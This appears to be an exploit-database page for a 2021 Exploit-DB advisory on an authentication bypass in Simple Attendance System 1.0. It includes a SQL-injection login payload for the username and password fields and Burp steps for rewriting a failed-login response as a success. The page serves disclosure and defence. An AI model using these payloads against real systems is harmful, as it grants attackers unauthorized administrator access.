header-logo
Suggest Exploit
vendor:
Simple Attendance System
by:
Abdullah Khawaja (hax.3xploit)
7,5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Simple Attendance System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:oretnom23:simple_attendance_system:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux, Windows
2021

Simple Attendance System 1.0 – Authenticated bypass

Simple Attendance System, is prone to multiple vulnerabilities. Easy authentication bypass vulnerability on the application allowing the attacker to login. The attacker can use the wrong credentials and capture the request in burp and send it to repeater. Then, the attacker can replace the response with a successful login response and forward the request. This will allow the attacker to login as admin.

Mitigation:

Ensure that authentication credentials are properly validated and that the application is not vulnerable to authentication bypass.
Source

Exploit-DB raw data:

# Exploit Title: Simple Attendance System 1.0 - Authenticated bypass
# Exploit Author: Abdullah Khawaja (hax.3xploit)
# Date: September 17, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14948/simple-attendance-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/attendance_0.zip
# Tested on: Linux, windows
# Vendor: oretnom23
# Version: v1.0

# Exploit Description:
Simple Attendance System, is prone to multiple vulnerabilities. 
Easy authentication bypass vulnerability on the application 
allowing the attacker to login


----- PoC: Authentication Bypass -----

Administration Panel: http://localhost/attendance/login.php

Username: admin' or ''=' -- -+
Password: admin' or ''=' -- -+


----- PoC-2: Authentication Bypass -----

Steps: 
1. Enter wrong crendentials http://localhost/attendance/login.php
2. Capture the request in burp and send it to repeater.
3. Forward the request.
4. In response tab, replace :
    {"status":"failed","msg":"Invalid username or password."}
                with
    {"status":"success","msg":"Login successfully."}

Navigation

Suggest Exploit

Services By CQR